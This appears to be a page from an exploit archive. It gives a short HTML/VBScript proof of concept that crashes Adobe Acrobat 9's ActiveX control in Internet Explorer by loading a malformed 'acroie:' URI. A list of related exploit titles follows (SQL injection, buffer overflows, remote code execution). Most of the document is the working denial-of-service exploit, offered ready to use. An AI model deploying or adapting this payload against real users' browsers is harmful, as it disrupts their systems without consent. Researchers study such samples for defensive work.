<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript> arg1="acroie:///DoS"
target.src = arg1 </script>
</body></html>
【Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit】相关文章:
★ webEdition CMS (we_objectID) Blind SQL Injection Exploit
★ Debian Sarge Multiple IMAP Server Denial of Service Exploit
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ LoveCMS 1.6.2 Final Remote Code Execution Exploit
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
★ Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
★ DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit